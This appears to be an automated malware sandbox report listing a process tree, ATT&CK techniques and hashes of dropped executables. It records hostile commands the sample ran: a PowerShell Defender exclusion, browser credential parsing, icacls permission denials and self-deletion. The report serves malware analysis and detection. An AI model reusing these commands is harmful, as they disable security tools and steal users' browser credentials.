"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4976 /prefetch:8
12⤵
PID:9048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1340 /prefetch:8
12⤵
PID:784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3948 /prefetch:8
12⤵
PID:7624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3956 /prefetch:8
12⤵
PID:6724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4784 /prefetch:8
12⤵
PID:6460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4332 /prefetch:8
12⤵
PID:9032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3840 /prefetch:8
12⤵
PID:8096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4288 /prefetch:8
12⤵
PID:1744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4568 /prefetch:8
12⤵
PID:8916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
12⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3528 /prefetch:8
12⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3936 /prefetch:8
12⤵
PID:8820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3696 /prefetch:8
12⤵
PID:4680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3912 /prefetch:8
12⤵
PID:3336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4340 /prefetch:8
12⤵
PID:8164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5164 /prefetch:8
12⤵
PID:5476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:8
12⤵
PID:3692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:8
12⤵
PID:6548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3928 /prefetch:8
12⤵
PID:5624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3840 /prefetch:8
12⤵
PID:4272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:8
12⤵
PID:5572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1
12⤵
PID:5668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5056 /prefetch:8
12⤵
PID:4456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4548 /prefetch:8
12⤵
PID:5872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:8
12⤵
PID:6236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1432 /prefetch:8
12⤵
PID:6892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:8
12⤵
PID:5568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3552 /prefetch:8
12⤵
PID:7004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:8
12⤵
PID:6996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
12⤵
PID:6000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5160 /prefetch:8
12⤵
PID:4372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5304 /prefetch:8
12⤵
PID:6580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
12⤵
PID:7780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3720 /prefetch:8
12⤵
PID:6244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:8
12⤵
PID:6256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3936 /prefetch:8
12⤵
PID:3548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4556 /prefetch:1
12⤵
PID:5956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:8
12⤵
PID:6608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
12⤵
PID:6396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5296 /prefetch:8
12⤵
PID:5824

C:\Windows\regedit.exe
regedit /s chrome-set.reg
8⤵
- Runs .reg file with regedit
PID:5492

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b firefox
8⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b chrome
8⤵
PID:6480

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b edge
8⤵
PID:7520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\durcpuw0.lif\Fulltr.exe & exit
5⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\durcpuw0.lif\Fulltr.exe
C:\Users\Admin\AppData\Local\Temp\durcpuw0.lif\Fulltr.exe
6⤵
PID:6620

C:\Users\Admin\AppData\Local\Temp\durcpuw0.lif\Fulltr.exe
"C:\Users\Admin\AppData\Local\Temp\durcpuw0.lif\Fulltr.exe"
7⤵
PID:6208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zr553ool.tu0\GcleanerWW.exe /mixone & exit
5⤵
PID:8308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ucwugeos.fzf\privacytools5.exe & exit
5⤵
PID:8084

C:\Users\Admin\AppData\Local\Temp\ucwugeos.fzf\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\ucwugeos.fzf\privacytools5.exe
6⤵
PID:8652

C:\Users\Admin\AppData\Local\Temp\ucwugeos.fzf\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\ucwugeos.fzf\privacytools5.exe
7⤵
PID:1980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qba5dble.hc3\setup.exe /8-2222 & exit
5⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\qba5dble.hc3\setup.exe
C:\Users\Admin\AppData\Local\Temp\qba5dble.hc3\setup.exe /8-2222
6⤵
PID:8980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Red-Feather"
7⤵
PID:5148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfwtv031.sao\MultitimerFour.exe & exit
5⤵
PID:8428

C:\Users\Admin\AppData\Local\Temp\xfwtv031.sao\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\xfwtv031.sao\MultitimerFour.exe
6⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\19FT4NY4J5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\19FT4NY4J5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
7⤵
PID:7640

C:\Users\Admin\AppData\Local\Temp\E4B1.exe
C:\Users\Admin\AppData\Local\Temp\E4B1.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:960

C:\Users\Admin\AppData\Local\Temp\E9D2.exe
C:\Users\Admin\AppData\Local\Temp\E9D2.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2888

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:4876

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Users\Admin\AppData\Local\Temp\F08A.exe
C:\Users\Admin\AppData\Local\Temp\F08A.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F08A.exe"
2⤵
PID:8432

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
3⤵
- Delays execution with timeout.exe
PID:8560

C:\Users\Admin\AppData\Local\Temp\F34A.exe
C:\Users\Admin\AppData\Local\Temp\F34A.exe
1⤵
- Executes dropped EXE
PID:1488

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\A73A.exe
C:\Users\Admin\AppData\Local\Temp\A73A.exe
1⤵
PID:8236

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
2⤵
PID:3668

C:\Users\Admin\AppData\Local\Temp\B024.exe
C:\Users\Admin\AppData\Local\Temp\B024.exe
1⤵
PID:8368

C:\Users\Admin\AppData\Local\Temp\D9D5.exe
C:\Users\Admin\AppData\Local\Temp\D9D5.exe
1⤵
PID:2436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7717.bat" "
2⤵
PID:7592

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:8964

C:\Users\Admin\AppData\Local\Temp\F28E.exe
C:\Users\Admin\AppData\Local\Temp\F28E.exe
1⤵
PID:4592

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\3d8a3b66-37a2-471f-818a-df94b51a1482" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:4832

C:\Users\Admin\AppData\Local\Temp\3E9C.exe
C:\Users\Admin\AppData\Local\Temp\3E9C.exe
1⤵
PID:6940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo UknXVSHY
2⤵
PID:8668

C:\Users\Admin\AppData\Local\Temp\52E0.exe
C:\Users\Admin\AppData\Local\Temp\52E0.exe
1⤵
PID:7824

C:\Users\Admin\AppData\Local\Temp\5E89.exe
C:\Users\Admin\AppData\Local\Temp\5E89.exe
1⤵
PID:7760

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7132

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6372

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {4234D49B-0245-4DF3-B780-3893943456E1} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
1⤵
PID:8144

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Picture Lab\Pictures Lab.exe
MD5
fa7f87419330e1c753dd2041e815c464

SHA1
3e32d57f181ca0a7a1513d6b686fea8313e8f8ec

SHA256
a9163105d0bb9b2a5007e3726b093caf08d24c53147086b80fda990f90417cd9

SHA512
7828a6a851c909fcfd7da0463775695ef8bdb2ac5b8d03d04af005b2e9d01cfd385b5acc2d9d26e5e465266881478686fcf67cff8e5aa0fd5bda2a28355d2861

Download Submit
C:\Program Files\Windows Defender\MJZQZMALRA\prolab.exe
MD5
7233b5ee012fa5b15872a17cec85c893

SHA1
1cddbafd69e119ec5ab5c489420d4c74a523157b

SHA256
46a209c1f32c304a878395b6df5b2e306fd6eea0db40f0bab0a6d71eeb6b8628

SHA512
716ff0dfd097e178d1023fe9e65720bc36b94d291811211a57193df7605616db1752dabaf5637a361c9996510242a71fc58d173605e251d733ae6431da9a1b4f

Download Submit
C:\Program Files\Windows Defender\MJZQZMALRA\prolab.exe
MD5
7233b5ee012fa5b15872a17cec85c893

SHA1
1cddbafd69e119ec5ab5c489420d4c74a523157b

SHA256
46a209c1f32c304a878395b6df5b2e306fd6eea0db40f0bab0a6d71eeb6b8628

SHA512
716ff0dfd097e178d1023fe9e65720bc36b94d291811211a57193df7605616db1752dabaf5637a361c9996510242a71fc58d173605e251d733ae6431da9a1b4f

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picture Lab.lnk
MD5
6455d49814a5212b7d522b41bb05989e

SHA1
696a72b9d81820cc1b5a56ba3e7e59958ee5c530

SHA256
15b3b10b768496347c060c4d5cc0f584b63823c5309be93f39f620558885f960

SHA512
54711851a029d71711cdc59d02181742efbb8333a075a07667e6647f87e238ace0c08d3dcb08d0e0c6bd128699c138cde732e36dd62ab0f07262ddc381c44bb1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
3a132b7a7872b53ec5649374cb9ab64b

SHA1
f47a5d4cd2e1c900ca4b89007798173522083a9d

SHA256
95a0bb021eb40c07b31deb026277c498caf54e0edac5d4bed784efb49bd76ad7

SHA512
4d3782a33d4a5d080aeaf056ccb4ce9f3a73696e9de9d7b947b5fd38af4d0972335f6aade27ead1e0a78e061a376320c29ce1fb7a7e5b50089b5914605c04d0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3e-e96b8-0f2-46c95-e49d7eec99f02\Kenessey.txt
MD5
97384261b8bbf966df16e5ad509922db

SHA1
2fc42d37fee2c81d767e09fb298b70c748940f86

SHA256
9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

SHA512
b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

Download Submit
C:\Users\Admin\AppData\Local\Temp\3e-e96b8-0f2-46c95-e49d7eec99f02\Sebyjaseku.exe
MD5
34cccb7d4dea26f230efac574703f185

SHA1
3834037b3c834e71d40dc76e2ecc964f32119e6d

SHA256
52d73e54e41b4c3ce51af8167819e0e4f7148cac665241ccf32812e50dc45dc5

SHA512
5e7c80300e8e2f095949f43adb06e34709fb882d7c281ceb3f573ef5d7c76f96152509608ab26a9a1dcc53e420d9e056987bf12958d4e83945a158186a5da00f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3e-e96b8-0f2-46c95-e49d7eec99f02\Sebyjaseku.exe
MD5
34cccb7d4dea26f230efac574703f185

SHA1
3834037b3c834e71d40dc76e2ecc964f32119e6d

SHA256
52d73e54e41b4c3ce51af8167819e0e4f7148cac665241ccf32812e50dc45dc5

SHA512
5e7c80300e8e2f095949f43adb06e34709fb882d7c281ceb3f573ef5d7c76f96152509608ab26a9a1dcc53e420d9e056987bf12958d4e83945a158186a5da00f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3e-e96b8-0f2-46c95-e49d7eec99f02\Sebyjaseku.exe.config
MD5
98d2687aec923f98c37f7cda8de0eb19

SHA1
f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

SHA256
8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

SHA512
95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

Download Submit
C:\Users\Admin\AppData\Local\Temp\B56B.exe
MD5
80e38f76b28b0c5a4a4105a1b21b49eb

SHA1
c7168c47994e947c926ae2a9194346ddd4c7b2ab

SHA256
c9c002c2a52fc74d69ee0f13f03a28081964eb96e9be0938f34448d5cfbe0184

SHA512
0efcdfcdebf9ed3f43f660caad1112e8cf33580ee46f1d2a983696a9821f7e347bf7b771fe9ad69c78f53bdcac3e3043a5350f8f9bcfccbf4bdf7bd61eb7426a

Download Submit
C:\Users\Admin\AppData\Local\Temp\B56B.exe
MD5
80e38f76b28b0c5a4a4105a1b21b49eb

SHA1
c7168c47994e947c926ae2a9194346ddd4c7b2ab

SHA256
c9c002c2a52fc74d69ee0f13f03a28081964eb96e9be0938f34448d5cfbe0184

SHA512
0efcdfcdebf9ed3f43f660caad1112e8cf33580ee46f1d2a983696a9821f7e347bf7b771fe9ad69c78f53bdcac3e3043a5350f8f9bcfccbf4bdf7bd61eb7426a

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB48.exe
MD5
4d5c74315caa879b34ec9a16666da04d

SHA1
31d0db93556db07391044d39b0d44256f8f4b878

SHA256
da6abc01fec71455ebf91bfcc744a92b46fec95ae03ed9503819901266ec33ab

SHA512
682973d57610ff07abecd42f912988cee51555fb5b50733c24129460e8b24f42c4130012fa3e70db9540ffc1f258983034487b2adf178db90183c61f3f210912

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB48.exe
MD5
4d5c74315caa879b34ec9a16666da04d

SHA1
31d0db93556db07391044d39b0d44256f8f4b878

SHA256
da6abc01fec71455ebf91bfcc744a92b46fec95ae03ed9503819901266ec33ab

SHA512
682973d57610ff07abecd42f912988cee51555fb5b50733c24129460e8b24f42c4130012fa3e70db9540ffc1f258983034487b2adf178db90183c61f3f210912

Download Submit
C:\Users\Admin\AppData\Local\Temp\BCEF.exe
MD5
fa2453a9932c09b5de4cbba38bc2d631

SHA1
6bf244ec79c64fbf788ebbed1ccf3f4f83c1153d

SHA256
58f617f6bebae9806e3f7f3c1759fc6ba4fd5bd1cc52603557608df2e41b3a90

SHA512
6126129be9b517e61e08be125c3f71b4b4f77ac90fb2fc80d4e246b1105ccb73bbd1784622e2da9dd38e1abee466a641c61c29ce9ea95a5446513e583836873f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BCEF.exe
MD5
fa2453a9932c09b5de4cbba38bc2d631

SHA1
6bf244ec79c64fbf788ebbed1ccf3f4f83c1153d

SHA256
58f617f6bebae9806e3f7f3c1759fc6ba4fd5bd1cc52603557608df2e41b3a90

SHA512
6126129be9b517e61e08be125c3f71b4b4f77ac90fb2fc80d4e246b1105ccb73bbd1784622e2da9dd38e1abee466a641c61c29ce9ea95a5446513e583836873f

Download Submit
C:\Users\Admin\AppData\Local\Temp\C915.exe
MD5
0b0112cc882ffdfbaf7f0bb6f94c39fc

SHA1
08bd37f9111e87dd0234da571d1b53341f919f68

SHA256
4799288856f5cdcba6cc269c12b83f6e07067e26207fa25d5c6631133b99f68a

SHA512
66896f5c74f586d3771ff113f4fec8ed864f49975a4f2cf8186e8edd02ce25d2f6036c1bfc2d1c90b84c054a5e621b703eb7e201b7cdadf8b8cfee934ffbe66f

Download Submit
C:\Users\Admin\AppData\Local\Temp\C915.exe
MD5
0b0112cc882ffdfbaf7f0bb6f94c39fc

SHA1
08bd37f9111e87dd0234da571d1b53341f919f68

SHA256
4799288856f5cdcba6cc269c12b83f6e07067e26207fa25d5c6631133b99f68a

SHA512
66896f5c74f586d3771ff113f4fec8ed864f49975a4f2cf8186e8edd02ce25d2f6036c1bfc2d1c90b84c054a5e621b703eb7e201b7cdadf8b8cfee934ffbe66f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CA6E.exe
MD5
56a9303674fac0d3aeee2bacfa5bfa5b

SHA1
14d9338e51045401bc1f758af29380fc3a163fe6

SHA256
5fece9f99eab40f9abc4ad2337bd377178b497e9ab1c2d182a1a60a133d33780

SHA512
9666168aba04108b7ceb47fd6443b3b7711fcd8177e2b8cd373fb3830d5f5be2941827b7336d17602bdf62b084a5fea7176ee006ac17489251e2aa0d6b1007d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CA6E.exe
MD5
56a9303674fac0d3aeee2bacfa5bfa5b

SHA1
14d9338e51045401bc1f758af29380fc3a163fe6

SHA256
5fece9f99eab40f9abc4ad2337bd377178b497e9ab1c2d182a1a60a133d33780

SHA512
9666168aba04108b7ceb47fd6443b3b7711fcd8177e2b8cd373fb3830d5f5be2941827b7336d17602bdf62b084a5fea7176ee006ac17489251e2aa0d6b1007d9

Download Submit
